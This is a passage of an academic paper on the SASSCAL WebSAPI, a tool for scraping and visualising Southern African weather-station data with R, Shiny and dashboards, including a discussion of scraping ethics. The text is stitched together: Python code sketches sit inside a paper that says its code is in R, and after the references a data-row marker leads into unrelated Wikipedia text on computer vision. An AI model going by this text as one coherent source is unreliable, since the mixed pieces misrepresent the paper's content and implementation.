television and a Facebook page) to disseminate weather information to the public. On a related note, BIUST identified “Climate and Society” as one of its thematic areas3 of focus. This is geared towards enhancing services related to: climate and impact modeling; early warning, and disaster management for weather and climate change. In 2016, BIUST installed an AWS equipped with a local machine running XConnect for data logging of historical weather data. Likewise, this particular AWS also lacks the backend service layer for dissemination of weather outputs to end users. All these can be seen as barriers and hence limitations of access to the generated weather data. For instance, to request data, clients have to go through some hectic processes. In the case of BIUST, clients have to request data using email, or copy it from the officers using physical storage devices like memory cards. 
In the case of the BDMS, end users download and complete a form,4 then submit it to the BDMS; the service time is three days. The demand for climatological data in Southern Africa clearly invites key stakeholders (i.e., researchers and developers) and organisations to implement platforms that facilitate easy access to and visualisation of climate data. As a result, the Southern African Science Service Centre for Climate and Land Management (SASSCAL) was initiated (Helmschrot et al. 2015) to support regional weather monitoring and climate research in Southern Africa (Muche et al. 2018). The SASSCAL Weathernet5 disseminates near-real-time data from AWSs at hourly intervals, including aggregated daily and monthly data (see Figure 1). Figure 1: Visualisation of AWS data via the SASSCAL Weathernet. The SASSCAL weather data is reviewed for quality control before dissemination (Kaspar et al. 2015). These data can also be integrated with data from different sources for research purposes. For instance, Moses (2018) merged them with other meteorological data from the BDMS to analyse the effects of solar radiation, wind speed and humidity on evapo-transpiration around the Okavango Delta. Similarly, predictive data analysis and modeling of temperature patterns (Thapelo 2014; Thapelo & Jamisola 2019) is vital in the understanding of heatwaves (Moses 2017), while rainfall values can help in assessing rainfall erosivity (Singh & Singh 2020). Despite the distinct potential uses of the SASSCAL weather data, there is a burden on end users to access, download and use such data in research (see Figure 2). First, the user has to navigate to the SASSCAL Weathernet to identify a country, the AWS of interest, and the temporal resolution of the weather data. The user can then manually copy and paste the whole data set into a storage file for data analysis. There is an option to download the SASSCAL weather data in Excel format only; however, there is no option to select only the desired weather values from the AWSs of interest. Even after downloading the weather data, end users face the challenge of generating clean data sets containing the desired variables for further use. The situation worsens when extracting finer temporal data from multiple AWSs across the entire region. Figure 2: Manually extracting data from the SASSCAL Weathernet. This process is costly, time-consuming and error-prone. This work presents the SASSCAL Web Scraping Application Programming Interface (WebSAPI). Web scraping (Munzert et al. 2014) is a data science technique that deploys scripts for the extraction of structured data from websites. A script is a computer program that automates a specific task using a programming language such as R or Python. Thus, a WebSAPI can be seen as an application service that allows access to online data for further use in research projects. By digitising the BDMS's climate data request form,4 this work enables end users to (1) access and visualise weather data from the SASSCAL Weathernet; and (2) download desired data for use in data-driven projects. The structure of the work is as follows. 
Section II provides a brief background information to this work. Section III presents the approach deployed in the development of the SASSCAL WebSAPI. Section IV presents results. It also illustrates how the SASSCAL WebSAPI can be used to support the extraction of weather variables, as well as the visualisation and dissemination of the generated outputs. Lastly, section V and VI present discussions and conclusions. Most of African countries (Tufa et al. 2014) like Botswana (Nkemelang et al. 2018) are lagged behind in terms of climate informatics (Vyacheslav et al. 2019) and environmental data science (Gibert et al. 2018, Vyacheslav et al. 2019). This can be attributed to lack of readily available platforms and data as also pointed out in (Schuol Abbaspour 2007, Tufa et al. 2014). All these bottlenecks can be unlocked by integrating computing technologies like web scraping and dashboard applications. Web scraping techniques have been widely deployed in a number of projects from different disciplines such as economics (Robert Paul 2020) and climate science (Yang et al. 2010). Regardless of the discipline, the general idea is to allow greater visibility, access, extraction and usability of the online data. This work contributes by addressing the second “pillar” of the Global Framework for Climate Services (Vaughan et al. 2016) using climate informatics. This WebSAPI is motivated by authors in (Bonifacio et al. 2015) who presented a free tool for automated extraction and consolidation of climate data from different online web data banks. A similar work by Yang et al. (Yang et al. 2010) presented a system with functionalities for scraping, filtering and visualising climatic data for easy use. This work is related to Ref (Sitterson et al. 2020) regarding the user API for data request. It is also related to (Bonifacio et al. 2015) in such it deconstructs the URL for a given station and then modifies the date range and the desired temporal resolution to extract desired weather data. Web scraping is still emerging, with no dominant standards at current. This technology also presents a combination of ethical and legal challenges (Krotov Vlad and Johnson Leigh and Silva Leiser 2020, Mason 1986) that necessitates standards to support data exchange. The ethical issues attached to web scraping can be summed into four generic groups: property, privacy, accessibility and accuracy (Mason 1986). Web scrappers can also compete with the main data provider APIs, which might diminish the value of the organisation’s intended mission (Hirschey 2014). For instance, if a web scrapper attracts more clients than the intended main API, then end users might end up neglecting the platform of that organisation. All these invite multi-disciplinary collaboration (i.e., government sectors, academia and industrial practitioners) to establish standards and boundaries for technology usage. This could irrefutably catalyse the development and adoption of the generated data driven outputs as also supported in (Fundel et al. 2019, Katz Murphy 2005). The first task was to identify the data sources, and the SASSCAL Weathernet came to the rescue. The aim of the SASSCAL WebSAPI is to improve data accessibility and visualisation of the SASSCAL Weather data before data analysis and predictive modeling. The target of this work was to develop and implement independent algorithms that can, later on, be consolidated and integrated into a package for data driven projects requiring SASSCAL weather data. 
The SASSCAL WebSAPI comprises of modularised algorithms packaged into scripts to enable direct control of weather data provided by the SASSCAL weathernet. This include but not limited to algorithms targeted at: processing the SASSCAL Weathernet link; determining the pages containing relevant weather data; deconstructing and parsing contents of the HTML file; extracting required weather data from selected pages; combining data (i.e., data wrangling) into data frames to generate data sets and visuals; as well as sharing the generated outputs using interactive dashboards. The SASSCAL Weathernet enables the public to use one domain to access the AWS data. Each SASSCAL country member has various AWSs, each with a unique identifier (ID). Access to the data is defined using the same abstract pattern. In essence, one can query the website’s database for any AWS within the SASSCAL region by providing the corresponding URL. Thus, one can extract the weather data via a tailored API using formats like HTML and XML. The home page URL for each SASSCAL AWS data is defined by: x y?z; where x is the preamble in link 5; y is just the weatherstat AO we.php token that defines the weather statistics for a given resolution (monthly, daily or hourly); and z is the string describing the logger ID (loggerid crit n), where n is the AWS’ unique ID. Tables containing relevant data are found by trial and error (i.e., by inspect individual elements of the SASSCAL weathernet page), or just exploring the source code of the web page. This work deploys the workflow depicted in Figure 3 following the data science approach in (Bradley James 2019, Hadley Garrett 2016) using open-source platforms (i.e., R version 4.0.3 and RStudio 1.1.463). Thus, the algorithms are coded in R, and the functions are tested using the RMarkdown which facilitates reproducibility. R has excellent packages for statistical data science and visualisation. Table 1 shows packages deployed in this work. Workflow of the SASSCAL WebSAPI. Table 1 R packages proposed in this work. A helper function (helper.R) is scripted to install and load the packages included in Table 1. The rvest (Wickham Wickham 2016) package is required for web scraping; while the XML (Lang Lang 2015) is required for XML document processing. The ggplot2 (Wickham 2011) is used for data visualisation. The Shiny (Chang et al. 2015) and Flexdashboard (Allaire 2017) packages are used to design the WebSAPI’s dashboard. The htmlwidgets framework is deployed to provide high-level R bindings to the JavaScript libraries for data visualization. All these functions are embedded in a reproducible RMarkdown to implement the proposed SASSCAL WebSAPI. The data driven pipeline used in this work is summarised in Figure 3. Algorithm 1 implements an interactive map to visualise where the AWSs are located geographically. Here, w is a vector of AWSs for a given country, x and y are vectors of the latitude and longitude coordinates of the AWSs, z is a vector detailing the descriptions of a given AWS. The algorithm also allows users to select specific AWSs; thanks to the leaflet package. In Algorithm 1, the dataframe c’ defining the inputs is piped into the leaflet function to automatically generate an auto-size map that fits markers of all AWSs. This function also adds some bounds in (Line 4) so that the user can’t scroll too far away from the markers of AWSs. The interactive map pops up the name of the AWS as the user hovers the mouse over a marker. 
This simple map functionality is crucial for end users (i.e., researchers) since it provides spatio-visual exploration of the AWSs that are supported by the SASSCAL Weathernet. Algorithm 1: Visualise the AWSs of a given country. The web scraping functionality in Algorithm 2 uses the All_AWS_ID.R script to construct vectors that store the names and IDs of the AWSs. The AWS_ID_Getter function assigns an AWS name (i.e., “x”) to its corresponding ID (i.e., “value”) using a hash map (see Lines 7 and 8). Thus, to find the ID for a given AWS of interest, the function looks it up in the hash map and retrieves that AWS’s ID. Algorithm 2: Data scraper. The AWS name, ID and date are then used to construct a URL, which the DataHarvester.R function in Algorithm 3 uses to fetch the data. The DataHarvester takes in a URL for a given AWS. The URL string can be partitioned into tokens (i.e., using just the AWS name and date) to facilitate easy input. Algorithm 3: Data harvesting. The XML package (Lang and Lang 2013) was used to parse a given URL and create a Document Object Model (DOM). The readHTMLTable() function from the XML package is used to specify the weather data to select from the HTML tables in the SASSCAL Weathernet. The number of tables for a given DOM was determined using R’s built-in length() function. There are three DOM instances, one for each temporal resolution, each with multiple tables. There are 14 tables in the DOM corresponding to the web page with hourly data, and the values of interest are in the 13th table. The DOM for the web page with daily observations has 13 tables, and the daily values of interest are in the 12th table. The last DOM has 18 tables, with the monthly data contained in the 10th table. Line 3 in Algorithm 3 facilitates the cleaning and selection of the desired weather tables using a table-index parameter (i.e., 13, 12 or 10, as discussed above). A further parameter defines the extensions that fix the columns of the table to be visualised, while another defines extra options for buttons that allow end users to search, scroll, copy and download the weather data visualised via the table. The DataWrangler() function was implemented to iterate through the table containing the dates of observations. It uses a date-range argument to determine the date range for the data of interest. The extracted weather data is then unified into a single data frame to generate data sets for further use, as illustrated in Figures 4 and 5 in section IV. Figure 4: Visualising Botswana AWSs using Algorithm 1. Figure 5: Screenshot of the SASSCAL WebSAPI for capturing user input when requesting weather data. The GUI allows end users to select the geographical location of interest (i.e., Botswana), the temporal resolution, the AWS of interest and the downloading of data. The multi-input selection of AWSs provides end users with a feedback mechanism that notifies them of the selected AWS, as seen on the tab titled “Currently Selected AWS”. This is quite useful for a quick exploration of geographic locations before downloading data. Algorithm 4 implements functionalities for the dashboard page. These include the dashboardHeader() function to define the title and the dashboardSidebar() function to define the two functionalities for visualising the tables of numerical weather data from an AWS of a given country. The dashboardBody() facilitates selection of the AWS, the resolution, the date range, the use of the data and the weather values, as well as the functionality to export data. Since different end users have different needs, this work does not develop a complete GUI.
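Before turning to the dashboard, a compact Python sketch of this lookup-and-harvest flow is given below, reusing the fetch_station_tables() helper sketched earlier. The station names, logger IDs and resolution-specific page tokens are hypothetical placeholders; only the table positions (13th, 12th and 10th, converted to 0-based indices) come from the description above.

import pandas as pd

AWS_IDS = {"Example Station A": 101, "Example Station B": 102}   # hash map: AWS name -> logger ID (placeholders)

RESOLUTION_PAGE = {                                   # assumed resolution-specific page tokens ("y")
    "hourly": "weatherstat_hourly_we.php",
    "daily": "weatherstat_daily_we.php",
    "monthly": "weatherstat_monthly_we.php",
}
TABLE_INDEX = {"hourly": 12, "daily": 11, "monthly": 9}   # 13th, 12th and 10th tables, 0-based

def harvest(name, resolution, start, end):
    """Look up the AWS ID, fetch its page and keep only observations within [start, end]."""
    logger_id = AWS_IDS[name]                                               # Algorithm 2: hash-map lookup
    tables = fetch_station_tables(RESOLUTION_PAGE[resolution], logger_id)   # Algorithm 3: data harvesting
    df = tables[TABLE_INDEX[resolution]].copy()
    df["date"] = pd.to_datetime(df.iloc[:, 0], errors="coerce")   # assumes the first column holds the timestamp
    return df[df["date"].between(start, end)].reset_index(drop=True)   # DataWrangler-style date filtering

# weather = harvest("Example Station A", "daily", "2020-01-01", "2020-03-31")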
Interested readers should see (Robert and Paul 2020) on completing a dashboard API. Algorithm 4: Dashboard design for dissemination. This work documents the development process of a lightweight WebSAPI capable of extracting and displaying timely weather data based on the SASSCAL Weathernet. The WebSAPI is cost-effective since it is powered by open-source technologies. Besides the functionality of extracting numerical data, the WebSAPI’s tasks were expanded to include visuals using other formats like tables, maps and charts. Figure 4 shows an interactive map generated using Algorithm 1. The interactive map pops up the name of the AWS as the user hovers the mouse over a marker. The algorithms defined in section III-E only scrape data from one AWS at a time. These can be extended by adding functionality to specify multiple AWSs and then using a for loop to scrape the desired weather data, as shown in Figure 6. Figure 6: Screenshot of the SASSCAL WebSAPI’s GUI for data request, visualisation and extraction of data. In addition to selecting the desired AWS, temporal resolution and date range, the SASSCAL WebSAPI’s GUI allows end users to select the desired variables. In this work, a data driven template was developed in the form of a WebSAPI to facilitate efficacious interaction with the outputs generated by the SASSCAL Weathernet. The SASSCAL WebSAPI implements modularised algorithms to collect the SASSCAL weather data and generate high-quality data sets that can be used in data driven projects. Modularised scripts facilitate an efficient product design process that integrates efforts related to idea generation, concept development and the modification of existing systems and platforms to develop proper solutions. This section presents discussions regarding the data quality, legal aspects, limitations and implications of the proposed WebSAPI. The SASSCAL Weathernet data is checked for quality control, as mentioned in (Kaspar et al. 2015). This gives an “assurance” that the SASSCAL WebSAPI will provide quality data that will not mislead end users (i.e., researchers or decision makers). However, users should note that, due to occasional sensor faults, the correctness of data values cannot be fully guaranteed, as also indicated on the SASSCAL Weathernet (footnote 6). The declaration on SASSCAL data use indicates that free use is granted for non-commercial and educational purposes. Although there are no explicit restrictions on data scraping on the SASSCAL Weathernet, it is difficult to conclude that SASSCAL encourages end users to automatically scrape and extract data using tailor-made APIs. This can be justified by the note “For data requests regarding specific countries, stations, time periods or specific sensors please contact oadc-datarequest@sasscal.org” (footnote 7). It should be noted that the underlined aspects are the challenges proposed to be addressed through this work. Thus, personal APIs that programmatically extract the weather data by bypassing the designated SASSCAL Weathernet API can be seen as presenting a slight ethical dilemma for developers. The main hurdle relates to identifying and integrating appropriate data driven technologies to facilitate flexible access to, and visualisation of, the SASSCAL weather data. In this regard, a couple of algorithms have been completed and tested to optimise the task of web scraping. However, the task of retrieving weather data was tested using a relatively small dataset (94 instances).
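Returning briefly to the multi-AWS extension mentioned above, the sketch below loops over several stations, harvests each one with the harvest() helper sketched earlier and concatenates the results, pausing between requests so that automated scraping stays gentle on the SASSCAL servers. The station names are the same hypothetical placeholders as before.

import time
import pandas as pd

def harvest_many(names, resolution, start, end, pause_s=2.0):
    """Scrape several AWSs in turn and return one combined data frame."""
    frames = []
    for name in names:                                    # the "for loop" extension described above
        frames.append(harvest(name, resolution, start, end).assign(station=name))
        time.sleep(pause_s)                               # simple rate limiting between stations
    return pd.concat(frames, ignore_index=True)

# combined = harvest_many(["Example Station A", "Example Station B"],
#                         "daily", "2020-01-01", "2020-03-31")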
This small data set was chosen to ensure that the automatic scraping and retrieval of data is unlikely to damage or slow down the SASSCAL website’s servers. This toolkit is built on top of the SASSCAL Weathernet. Thus, changes in the structural representation of the SASSCAL Weathernet imply modifying the WebSAPI. There is no free lunch in problem solving. The process of web scraping and dashboard design is iterative and evolutionary. The integration of R, Flexdashboard and Shiny allows the development and deployment of interactive apps. However, before starting a web-scraping-based data driven project, developers should start by analysing the associated legality and ethics (Krotov et al. 2020, Mason 1986) to avoid possible bottlenecks; a minimal robots.txt check is sketched below. The contribution of this work is pragmatic rather than theoretical. The WebSAPI is flexible and reproducible, with the potential to be scaled up (expanded) to address other functionalities related to the use of SASSCAL weather data. Reproducibility is an important aspect of open science research and API development. It helps to reduce the time taken for data collection, development and testing, since the independent components (algorithms) have already been tried and tested. This approach has the potential to catalyse the development of packages from existing platforms to meet end-user requirements. It should be noted that neither the BDMS nor BIUST has an API to disseminate weather information. This WebSAPI is still under development, yet it has the potential to be adapted and incorporated into the portals of weather service providers (BIUST, BDMS, SASSCAL and WASCAL) to bridge gaps in weather and climate data access. Developing and implementing a data driven platform to serve end users is a challenging task that requires input from multidisciplinary stakeholders. This work integrated web scraping (Munzert et al. 2014), data wrangling and dashboard techniques to develop a lightweight SASSCAL WebSAPI. In comparison with previous web scraping literature, this work takes into consideration that data driven outputs need to be disseminated to end users. In this case, a dashboard prototype was developed in RMarkdown to facilitate reproducibility. The WebSAPI is expected to create new channels to extend the services of the SASSCAL Weathernet. By enabling efficacious and efficient data access, the SASSCAL WebSAPI has the potential to increase the productivity and quality of data driven projects that make use of SASSCAL weather data. The SASSCAL WebSAPI should be seen not as a replacement but rather as a complementary toolkit to the SASSCAL Weathernet. It does not cover all the tasks related to “weather data science”, but it provides the end-user community with the opportunity to reproduce it and develop in-depth product development skills to ultimately add more functionalities to a related API. In terms of extending this work, more end-user-driven functionalities will be added to this API to enable data driven operations and services, such as investigating strategies for the imputation of missing data, and modelling. Collaboration with the concerned stakeholders (i.e., SASSCAL, BDMS, BIUST), including end users (researchers, students and farmers), could catalyse the development and deployment process. This will enhance operational productivity while maximising the utilisation of these open-source technologies.
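In that spirit of checking the ground rules before scraping, one small, code-level courtesy is to consult a site's robots.txt with Python's standard library before issuing automated requests. This is only a sketch: the robots.txt location below is an assumption about the SASSCAL Weathernet, not a statement about what the site actually publishes, and it does not replace reading the site's terms of use.

from urllib.robotparser import RobotFileParser

def allowed_to_fetch(url, user_agent="sasscal-websapi-demo"):
    """Return True if robots.txt permits this user agent to fetch the given URL."""
    rp = RobotFileParser()
    rp.set_url("http://www.sasscalweathernet.org/robots.txt")   # assumed location
    rp.read()
    return rp.can_fetch(user_agent, url)

# if allowed_to_fetch("http://www.sasscalweathernet.org/weatherstat_daily_we.php"):
#     tables = fetch_station_tables("weatherstat_daily_we.php", 101)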
Efforts from this work are likely to spawn new projects and collaborations that will better inform citizens, continue to help them make use of the generated data, and contribute to the open-data community. This R-based toolkit is still under development. Parallel to this manuscript is a reproducible tutorial in RMarkdown, integrating Shiny and Flexdashboard for the visualisation and dissemination of outputs. The tutorial and code are available at https://github.com/EL-Grande/SASSACL-WebSAPI and the data are available online (footnote 5). Footnotes: 1. https://www.sasscal.org/. 2. https://wascal.org/. 3. www.biust.ac.bw/research/thematic-areas-platforms. 4. https://www.gov.bw/natural-resources/request-climatological-data. 5. http://www.sasscalweathernet.org/. 6. http://www.sasscalweathernet.org/imprint_we.php. 7. http://www.sasscalweathernet.org/contact_we.php. Acknowledgements: BIUST, for the partial financial support (reference number S 00086); and SASSCAL, for availing the data. Competing interests: The authors have no competing interests to declare. Author contributions: Thapelo TS: Conceptualization, Methodology, Resources, Application Development, Writing (Original Draft Preparation; Review and Editing); Namoshe M: Conceptualization, Resources, Formal Analysis, Review and Editing; Matsebe O: Conceptualization, Resources, Formal Analysis, Review and Editing; Motshegwa T: Resources, Formal Analysis, Review and Editing; Bopape MJM: Resources, Formal Analysis, Review and Editing. References: Allaire, J. 2017. Flexdashboard: R Markdown format for flexible dashboards. Bonifacio, C, Barchyn, TE, Hugenholtz, CH and Kienzle, SW. 2015. CCDST: A free Canadian climate data scraping tool. Computers & Geosciences, 75: 13–16. DOI: https://doi.org/10.1016/j.cageo.2014.10.010. Bopape, M-JM, Waitolo, D, Plant, RS, Phaduli, E, Nkonde, E, Simfukwe, H, Mkandawire, S, Rakate, E and Maisha, R. 2021. Sensitivity of Simulations of Zambian Heavy Rainfall Events to the Atmospheric Boundary Layer Schemes. Climate, 9(2): 38. DOI: https://doi.org/10.3390/cli9020038. Bradley, A and James, RJ. 2019. Web scraping using R. Advances in Methods and Practices in Psychological Science, 2(3): 264–270. DOI: https://doi.org/10.1177/2515245919859535. Chang, EK, Peña, M and Toth, Z. 2013. International research collaboration in high-impact weather prediction. Bulletin of the American Meteorological Society, 94(11): ES149–ES151. DOI: https://doi.org/10.1175/BAMS-D-13-00057.1. Chang, W, Cheng, J, Allaire, J, Xie, Y and McPherson, J. 2015. Package ‘shiny’. See http://citeseerx.ist.psu.edu/viewdoc/download. Dowle, M, Srinivasan, A, Gorecki, J, Chirico, M, Stetsenko, P, Short, T, Lianoglou, S, Antonyan, E, Bonsch, M, Parsonage, H, et al. 2019. Package ‘data.table’. Extension of ‘data.frame’. Dreyer, A and Stockton, J. 2013. Internet “data scraping”: A primer for counseling clients. New York Law Journal, 7: 1–3. Fundel, VJ, Fleischhut, N, Herzog, SM, Göber, M and Hagedorn, R. 2019. Promoting the use of probabilistic weather forecasts through a dialogue between scientists, developers and end-users. Quarterly Journal of the Royal Meteorological Society, 145: 210–231. DOI: https://doi.org/10.1002/qj.3482. Gibert, K, Izquierdo, J, Sánchez-Marrè, M, Hamilton, SH, Rodríguez-Roda, I and Holmes, G. 2018. Which method to use? An assessment of data mining methods in Environmental Data Science. Environmental Modelling & Software, 110: 3–27. Special Issue on Environmental Data Science: Applications to Air Quality and Water Cycle. DOI: https://doi.org/10.1016/j.envsoft.2018.09.021. Graul, C and Graul, MC. 2016. Package ‘leafletR’. Hadley, W and Garrett, G. 2016.
R for data science: import, tidy, transform, visualize, and model data. O’Reilly Media, Inc. Helmschrot, J, Muche, G, Hillmann, T, Kanyanga, J, Butale, M, Nascimento, D, Kruger, S, Strohbach, B, Seely, M, Ribeiro, C, et al. 2015. SASSCAL WeatherNet to support regional weather monitoring and climate-related research in Southern Africa. Proceedings of the International Association of Hydrological Sciences, 366: 170–171. DOI: https://doi.org/10.5194/piahs-366-170-2015. Hirschey, JK. 2014. Symbiotic relationships: Pragmatic acceptance of data scraping. Berkeley Tech. LJ, 29: 897. DOI: https://doi.org/10.2139/ssrn.2419167. Ives, B and Krotov, V. 2006. Anything you search can be used against you in a court of law: Data mining in search archives. Communications of the Association for Information Systems, 18(1): 29. DOI: https://doi.org/10.17705/1CAIS.01829. Kaspar, F, Helmschrot, J, Mhanda, A, Butale, M, de Clercq, W, Kanyanga, J, Neto, F, Kruger, S, Castro Matsheka, M, Muche, G, et al. 2015. The SASSCAL contribution to climate observation, climate data management and data rescue in Southern Africa. Advances in Science and Research, 12: 171–177. DOI: https://doi.org/10.5194/asr-12-171-2015. Katz, RW and Murphy, AH. 2005. Economic value of weather and climate forecasts. Cambridge University Press. Krotov, V, Johnson, L and Silva, L. 2020. Tutorial: Legality and Ethics of Web Scraping. Communications of the Association for Information Systems, 47(1): 22. DOI: https://doi.org/10.17705/1CAIS.04724. Lang, DT and Lang, MDT. 2013. Package ‘XML’. Lang, DT and Lang, MDT. 2015. Package ‘XML’. Mason, RO. 1986. Four ethical issues of the information age. MIS Quarterly, 5–12. DOI: https://doi.org/10.2307/248873. Molongwane, C, Bopape, M-JM, Fridlind, A, Motshegwa, T, Matsui, T, Phaduli, E, Sehurutshi, B and Maisha, R. 2020. Sensitivity of Botswana Ex-Tropical Cyclone Dineo rainfall simulations to cloud microphysics scheme. AAS Open Research, 3(30): 30. DOI: https://doi.org/10.12688/aasopenres.13062.1. Moses, O. 2017. Heat wave characteristics in the context of climate change over past 50 years in Botswana. Botswana Notes and Records; ub.bw/index.php/bnr. Muche, G, Kruger, S, Hillmann, T, Josenhans, K, Ribeiro, C, Bazibi, M, Seely, M, Nkonde, E, de Clercq, W, Strohbach, B, et al. 2018. SASSCAL WeatherNet: present state, challenges, and achievements of the regional climatic observation network and database. Biodiversity & Ecology, 6: 34–43. DOI: https://doi.org/10.7809/b-e.00302. Munzert, S, Rubba, C, Meissner, P and Nyhuis, D. 2014. Automated data collection with R: A practical guide to web scraping and text mining. John Wiley & Sons. DOI: https://doi.org/10.1002/9781118834732. Nkemelang, T, New, M and Zaroug, M. 2018. Temperature and precipitation extremes under current, 1.5 °C and 2.0 °C global warming above pre-industrial levels over Botswana, and implications for climate change vulnerability. Environmental Research Letters, 13(6): 065016. DOI: https://doi.org/10.1088/1748-9326/aac2f8. Oliver, M and Hambira, WL. 2018. Effects of climate change on evapotranspiration over the Okavango Delta water resources. Physics and Chemistry of the Earth, Parts A/B/C, 105: 98–103. DOI: https://doi.org/10.1016/j.pce.2018.03.011. Robert, S and Paul, S. 2020. Making health economic models Shiny: A tutorial. Wellcome Open Research, 5(69): 69. DOI: https://doi.org/10.12688/wellcomeopenres.15807.2. Schuol, J and Abbaspour, K. 2007.
Using monthly weather statistics to generate daily data in a SWAT model application to West Africa. Ecological Modelling, 201(3–4): 301–311. DOI: https://doi.org/10.1016/j.ecolmodel.2006.09.028. Singh, J and Singh, O. 2020. Assessing rainfall erosivity and erosivity density over a western Himalayan catchment, India. Journal of Earth System Science, 129(1): 1–22. DOI: https://doi.org/10.1007/s12040-020-1362-8. Sitterson, J, Sinnathamby, S, Parmar, R, Koblich, J, Wolfe, K and Knightes, CD. 2020. Demonstration of an online web services tool incorporating automatic retrieval and comparison of precipitation data. Environmental Modelling & Software, 123: 104570. DOI: https://doi.org/10.1016/j.envsoft.2019.104570. Somses, S, Bopape, M-JM, Ndarana, T, Fridlind, A, Matsui, T, Phaduli, E, Limbo, A, Maikhudumu, S, Maisha, R and Rakate, E. 2020. Convection Parametrization and Multi-Nesting Dependence of a Heavy Rainfall Event over Namibia with Weather Research and Forecasting (WRF) Model. Climate, 8(10): 112. DOI: https://doi.org/10.3390/cli8100112. Thapelo, ST. 2014. Técnicas de aprendizaje automatizado para el pronóstico de temperaturas mínimas en el Centro Meteorológico de Villa Clara, Santa Clara. PhD thesis, Universidad Central “Marta Abreu” de Las Villas. Thapelo, TS and Jamisola, RS. 2019. Machine learning for maximum and minimum temperature analytics and prediction at local level. Tufa, D, Paul, B, Jessica, S, Kinfe, H, Daniel, O, del Corral, J, Cousin, R and Thomson, MC. 2014. Bridging critical gaps in climate services and applications in Africa. Earth Perspectives, 1(1): 15. DOI: https://doi.org/10.1186/2194-6434-1-15. Vanderkam, D, Allaire, J, Owen, J, Gromer, D, Shevtsov, P and Thieurmel, B. 2015. dygraphs: Interface to ‘Dygraphs’ Interactive Time Series Charting Library. R package version 0.5. Vyacheslav, L, Andrew, R and Samuel, S. 2019. Statistics for climate informatics. Environmetrics, 30(4). DOI: https://doi.org/10.1002/env.2567. Wickham, H. 2011. ggplot2. Wiley Interdisciplinary Reviews: Computational Statistics, 3(2): 180–185. DOI: https://doi.org/10.1002/wics.147. Wickham, H and Wickham, MH. 2016. Package ‘rvest’. URL: https://cran.r-project.org/web/packages/rvest/rvest.pdf. Wickham, H and Wickham, MH. 2019. Package ‘stringr’. Yang, Y, Wilson, L and Wang, J. 2010. Development of an automated climatic data scraping, filtering and display system. Computers and Electronics in Agriculture, 71(1): 77–87. DOI: https://doi.org/10.1016/j.compag.2009.12.006 |
357 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_vision | Computer vision tasks include methods for acquiring, processing, analyzing and understanding digital images,and extraction of high-dimensional data from the real world in order to produce numerical or symbolic information, e.g. in the forms of decisions. 1 2 3 4 Understanding in this context means the transformation of visual images (the input to the retina in the human analog) into descriptions of the world that make sense to thought processes and can elicit appropriate action. This image understanding can be seen as the disentangling of symbolic information from image data using models constructed with the aid of geometry, physics, statistics, and learning theory. The scientific discipline of computer vision is concerned with the theory behind artificial systems that extract information from images. The image data can take many forms, such as video sequences, views from multiple cameras, multi-dimensional data from a 3D scanner, 3D point clouds from LiDaR sensors, or medical scanning devices. The technological discipline of computer vision seeks to apply its theories and models to the construction of computer vision systems. Sub-domains of computer vision include scene reconstruction, object detection, event detection, activity recognition, video tracking, object recognition, 3D pose estimation, learning, indexing, motion estimation, visual servoing, 3D scene modeling, and image restoration. Adopting computer vision technology might be painstaking for organizations as there is no single-point solution for it. Very few companies provide a unified and distributed platform or Operating System where computer vision applications can be easily deployed and managed. Computer vision is an interdisciplinary field that deals with how computers can be made to gain high-level understanding from digital images or videos. From the perspective of engineering, it seeks to automate tasks that the human visual system can do. 5 6 7 "Computer vision is concerned with the automatic extraction, analysis, and understanding of useful information from a single image or a sequence of images. It involves the development of a theoretical and algorithmic basis to achieve automatic visual understanding. 8 As a scientific discipline, computer vision is concerned with the theory behind artificial systems that extract information from images. The image data can take many forms, such as video sequences, views from multiple cameras, or multi-dimensional data from a medical scanner. 9 As a technological discipline, computer vision seeks to apply its theories and models for the construction of computer vision systems. Machine vision refers to a systems engineering discipline, especially in the context of factory automation. In more recent times, the terms computer vision and machine vision have converged to a greater degree. 10 : 13 In the late 1960s, computer vision began at universities that were pioneering artificial intelligence. It was meant to mimic the human visual system as a stepping stone to endowing robots with intelligent behavior. 11 In 1966, it was believed that this could be achieved through an undergraduate summer project, 12 by attaching a camera to a computer and having it "describe what it saw". 
13 14 What distinguished computer vision from the prevalent field of digital image processing at that time was a desire to extract three-dimensional structure from images with the goal of achieving full scene understanding. Studies in the 1970s formed the early foundations for many of the computer vision algorithms that exist today, including extraction of edges from images, labeling of lines, non-polyhedral and polyhedral modeling, representation of objects as interconnections of smaller structures, optical flow, and motion estimation. 11 The next decade saw studies based on more rigorous mathematical analysis and quantitative aspects of computer vision. These include the concept of scale-space, the inference of shape from various cues such as shading, texture and focus, and contour models known as snakes. Researchers also realized that many of these mathematical concepts could be treated within the same optimization framework as regularization and Markov random fields. 15 By the 1990s, some of the previous research topics became more active than others. Research in projective 3 D reconstructions led to better understanding of camera calibration. With the advent of optimization methods for camera calibration, it was realized that a lot of the ideas were already explored in bundle adjustment theory from the field of photogrammetry. This led to methods for sparse 3 D reconstructions of scenes from multiple images. Progress was made on the dense stereo correspondence problem and further multi-view stereo techniques. At the same time, variations of graph cut were used to solve image segmentation. This decade also marked the first time statistical learning techniques were used in practice to recognize faces in images (see Eigenface). Toward the end of the 1990s, a significant change came about with the increased interaction between the fields of computer graphics and computer vision. This included image-based rendering, image morphing, view interpolation, panoramic image stitching and early light-field rendering. 11 Recent work has seen the resurgence of feature-based methods used in conjunction with machine learning techniques and complex optimization frameworks. 16 17 The advancement of Deep Learning techniques has brought further life to the field of computer vision. The accuracy of deep learning algorithms on several benchmark computer vision data sets for tasks ranging from classification, 18 segmentation and optical flow has surpassed prior methods. citation needed 19 Solid-state physics is another field that is closely related to computer vision. Most computer vision systems rely on image sensors, which detect electromagnetic radiation, which is typically in the form of either visible, infrared or ultraviolet light. The sensors are designed using quantum physics. The process by which light interacts with surfaces is explained using physics. Physics explains the behavior of optics which are a core part of most imaging systems. Sophisticated image sensors even require quantum mechanics to provide a complete understanding of the image formation process. 11 Also, various measurement problems in physics can be addressed using computer vision, for example, motion in fluids. Neurobiology has greatly influenced the development of computer vision algorithms. Over the last century, there has been an extensive study of eyes, neurons, and brain structures devoted to the processing of visual stimuli in both humans and various animals. 
